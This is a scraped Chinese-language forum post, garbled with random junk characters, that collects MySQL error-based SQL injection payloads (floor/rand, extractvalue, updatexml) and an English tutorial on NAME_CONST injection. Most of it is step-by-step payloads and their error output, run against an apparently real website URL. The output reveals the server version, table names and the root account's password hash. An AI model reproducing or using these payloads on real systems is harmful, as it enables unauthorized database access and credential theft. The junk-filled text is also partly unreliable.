1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:( W& M" r1 r; H. ]
首先进行正常查询: mysql> select * from article where id = 1;
, P% y( k6 i; B3 L2 D) W+—-+——-+———+
! j9 k7 F7 {) i! D| id | title | content |
$ h/ k4 v8 L# w5 T) n+—-+——-+———+9 @# g! h4 L* m7 B2 D7 {3 y( S
| 1 | test | do it |( O) O9 x8 c& c8 J4 u
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
3 W2 J( S* Q( t8 @% o" `- J9 RERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
/ g3 X4 \8 L1 v* P& N2 U M例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
. g' e3 Y% c% ^5 x2 wERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));. o5 A7 M( Z/ Y* s/ R' U5 a/ F/ K
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue) z7 W4 e8 T, ~
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–% o) r8 g, m/ l; r
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ 1 P) l( t1 T& C, d+ S
4 o5 I$ s5 d: ~5 J) K再收集:
; W' X: ^4 Y2 ]$ t2 _9 lhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
/ a, O* p4 p) }. d d1 ~2 w5 h/ ^; U( F- O
Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
' \! A* U/ c4 V' b, }+ p
' X) ~1 t! h u/ y9 d7 mhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
* \$ m$ E. u+ f% P8 m$ E2 W& Q9 l; l& t: J2 y
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
: m* X' ^0 d( |7 B4 b& P" `8 ~1 ]! Y1 I* {
MYSQL高版本报错注入技巧-利用NAME_CONST注入3 L7 n, |) ?: \
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
p6 L. [) L ]2 ?5 C' G; S+ r* Z( [" V! i1 \
3 V6 i7 ^, }, `6 q: k! |% h- N( g6 s
相关信息
3 h" E7 L& I" Q0 f0 s. _2 ^+ {$ h8 N
% A! n: B5 `2 [. U+ eNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.- Q3 ]; h7 v% N% ]8 e$ G/ d8 ]' ~ ]
2 S( O) e# d5 `: o1 e* DCode:$ D" x- K5 l9 {
NAME_CONST(DATA, VALUE)
# `2 Q/ H3 S3 W% H( \ U' ] z
( e3 Y( T. h9 z( n3 dReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.! g0 M" |+ T: a1 r5 O$ ?/ T
& q& h+ J7 d, v/ U: e# p
SELECT NAME_CONST('TEST', 1)
4 g! ^6 x; W3 ?6 {1 |4 x
+ |3 w; h+ \) d1 E2 F7 f" V! y J& c7 y& y' S Y _& q
9 ^& @0 c/ w+ |1 G
|---------------|
( |" C$ V3 j3 s V% ]| TEST |
7 z' ^; s( V% y; H0 l9 b| |
, w, q9 [) V! L! G J5 b2 p|---------------|
7 v* _/ A$ Q. p2 a| 1 |% u2 V) w5 Q; f- X- U
| |
! P! T& l0 B) r/ _/ H; |3 V3 x|---------------|" L( [0 [/ I5 P+ D
$ t& t( j2 i: _; H8 N% a; Z7 Z/ y
4 P% w2 x8 e: _, ~: k. I4 \5 X }( _4 d0 F& o
0 B7 |8 s' j7 N6 I* @/ ^2 ^
http://dev.mysql.com/doc/refman/5.0/en/m...name-const% X2 c* h2 |% Q1 @" B: Y+ L, W( |
Intro to MySQL Variables
8 s& I# A$ T4 @! ?4 p' V0 j3 V: K5 b4 F1 f
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
% o |1 v0 m# I2 k S1 i) V- C; c# y' w: j4 B- b
Code:( h7 I, m7 M# O ^
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
1 A! ?0 X! U) d+ `
& w; U" d J* M3 u4 ] y+ f M) |+ J; {
& @- ]* O, K$ f& o" L9 P
: y" \; s5 u) C; S) H( F6 m. e) y- }9 x1 a
Code:
% x j8 N m( xand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
- D4 M& i2 ?" j4 M& r ~
/ |$ O5 _) U- V. P; d0 ] j- Z3 r2 N+ [4 H) g5 N* y' v
VAR = Your MySQL variable.7 |0 }4 N) ~4 s: j/ b+ J
% L: Q* J5 Y5 |5 Z
MySQL 5.1.3 Server System Variables
8 c* _8 Y' R# y2 w8 l0 r9 m) B9 i
: {# y4 C0 c' I. }) \7 ILet's try it out on my site..
! e- C" C" B8 ]; x+ Q9 L1 {0 p: A; }2 U; P" t" ?7 \
Code:
% K! e" i4 n& Z9 Khttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
' {! b$ a) }2 g# ^7 j# |0 I
9 z- h8 t! u" W% A4 k8 zErroruplicate column name '5.0.27-community-nt'
- D2 S6 c3 T: X# a. |. k- O$ m' w9 L
- P ~. s2 R. P. R0 e" y1 Y8 Y, k) a- o" e" F
* a5 J, E6 G- m7 Q: d; e* W
5 ^4 o9 b* j4 B, b* R, M5 E; K k% V/ e
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
/ D$ r& B _4 d, ]1 k$ g0 m- ~& m1 N* L: l! ^
Data Extraction
3 u+ y( O4 C/ N4 N N* Q t' W' k! w+ k/ j- G. t0 B5 x; c# A7 @
Code:
7 f7 M0 z) Y/ t+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
! {" S5 S% B1 n" B4 _
0 u+ m0 J1 _( Z i1 R: v! n" E4 o% b, e
We should get a duplicate column 1 error...3 q' F9 w- D+ X/ {1 g
8 I& x9 \1 c% fCode:/ f' U; b" Y/ R% ?
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--/ h$ G* f4 ]" E, }% V: U- [
1 M5 b H5 C" L
Erroruplicate column name '1
4 L! j" {" F; W; |2 U$ t k
, C5 H# T# Z( }4 I5 |2 O# ~9 d! h9 y/ b7 E
8 ?$ v6 J4 d0 Z4 J! b; C, z+ L+ \; l$ ?
5 O( @% j" {& P1 p0 E$ @; i2 L* E. L
Now let's get the tables out this bitch..
% h& v% k Q6 p6 T0 N1 [) t! _3 R( J0 ]8 Y9 z" T( I: t
Code:9 o1 T4 r6 V/ D
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
. q4 F6 T0 M8 R N& T- K( N2 C7 G' z: S, N9 R. u
: h* q0 D* Y! j& B. X
Let's see if it works here, if it does, we can go on and finish the job.
* x' l# Z5 F4 j+ l
; R. U( m a. DCode:+ N) K- Y' \/ C7 J- m3 Q
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
" @9 a# h) y( m& ?6 u$ f
6 ?9 J8 r5 N; Z |: b* {- d8 W0 b" j
Erroruplicate column name 'com_admanage
" V3 l8 S" d( o! g2 k; \
, u5 ?/ p+ O* O& c
* }0 P# c' u) s0 `' G
% E/ z3 B7 X0 t( S
$ K- c1 b& U( B b4 z1 V M- T
" J( Q7 r" ]. `0 {- @
1 O$ o& Z4 R% }& W3 ]1 ^0 xNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.3 ]: j2 S5 q( u
7 V/ p# a/ k0 G. W8 y
Let's get the columns out of the user table..0 S0 o% z! u* G. r
! a( N1 z- s# Q% `Code: O# a: X$ B" E* H8 k2 K' E2 W% l2 n
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
- z0 N! x% Q; \8 ~
4 V% X; m- [, F1 {
) c7 q; b6 E# k) P+ ESo mine looks like this, and I get the duplicate column name 'Host'." R M8 F5 C% _; u# n+ g
* B0 u/ A3 Q8 T: \0 d+ C" G1 N; k
Code:
3 D7 x/ @) j {" D& C- Z; ghttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
$ @# _- f- c0 H: v' d; \2 f' c+ z1 [2 T# J% j# C
Erroruplicate column name 'Host'
9 i7 T+ Q- p. T' k5 _' i4 B) y( n0 }9 |( ]. \
2 b, B% E4 h+ c
0 u5 o+ X. i# j) S
; D, A' d8 R0 N7 V$ b( x, @% z) i. T# U/ x: S+ D4 H9 d
$ h P% ^& Q% G6 ^# B g0 `
Woot, time to finish this bitch off.
1 g/ H5 V7 U9 }8 a/ E! o* g" D1 q1 ~9 M( U+ ?) l
Code:
* ]% J# h+ k$ N( j, u+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
( A& B* _; }! v. G9 F- m, y# f/ S, J' E$ z5 T2 l3 \
: g4 z, ^4 A4 l$ _! K$ j
So mine looks like this...
" x1 N% b1 \0 J# i F7 _
2 B5 v0 M# N+ aCode:
6 f( s3 |, a2 f9 a |http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--: D3 }9 M9 O$ S; h
# O; U% u" u* M6 @" \Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
9 [* M+ |/ K/ i. U/ q' L
. R! D( \1 c+ w- z# |/ W0 |6 r
: e3 G% {. I" l) t0 Q% X( f; e, k( k6 r* T
( _. E" d$ U; T& n, F: O6 s1 j3 y( J
And there we have it, thanks for reading.
: T, S$ A, T( J: T- }
) U6 D; U4 ?8 ?; T$ H |